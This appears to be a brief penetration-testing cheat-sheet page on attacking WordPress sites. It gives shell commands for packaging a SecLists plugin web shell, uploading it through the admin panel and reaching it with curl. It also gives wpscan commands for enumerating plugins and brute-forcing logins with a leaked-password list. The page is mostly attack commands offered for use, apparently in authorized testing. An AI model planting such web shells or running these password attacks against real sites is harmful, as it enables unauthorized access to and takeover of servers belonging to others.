Malicious Plugin

Write a web shell with a malicious plugin.
Copy a plugin shell from SecLists and zip it:
$ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
$ zip plugin-shell.zip plugin-shell.php
Upload plugin-shell.zip (Plugins > Add New) and install it (Upload Plugin > Browse... > Install Now) but do not activate! Now you can access the web shell:
$ curl ''


$ wpscan --url --api-token <API_TOKEN> --force -e ap [--plugins-detection aggressive] -o wpscan.out
$ wpscan --url --api-token <API_TOKEN> --force --passwords /usr/share/seclists/Passwords/darkweb2017-top1000.txt
Last modified 11mo ago
Copy link
On this page
Malicious Plugin